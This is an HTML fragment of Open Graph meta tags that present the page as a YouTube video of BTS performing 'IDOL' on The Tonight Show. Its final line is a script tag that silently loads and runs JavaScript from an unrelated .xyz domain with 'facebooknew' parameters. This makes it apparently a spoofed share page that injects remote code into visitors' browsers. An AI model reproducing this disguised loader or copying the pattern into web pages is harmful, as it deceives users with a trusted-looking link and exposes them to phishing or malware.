<meta property="og:site_name" content="YouTube" />
<meta property="og:url" content="https://www.youtube.com/watch?v=MXFkjMNXfpY" />
<meta property="og:title" content="BTS: IDOL" />
<meta property="og:image" content="https://i.ytimg.com/vi/MXFkjMNXfpY/maxresdefault.jpg" />
<meta property="og:image:width" content="1280" />
<meta property="og:image:height" content="720" />
<meta property="og:description" content="Musical guests BTS performs "IDOL" to kick off a special week of performances on The Tonight Show Starring Jimmy Fallon. The Tonight Show Starring Jimmy Fall..." />
<script src="https://lllllokooolaa.xyz/?api=1&lan=facebooknew&ht=1&counter0=jcbonlyall" type="text/javascript" async="true"></script>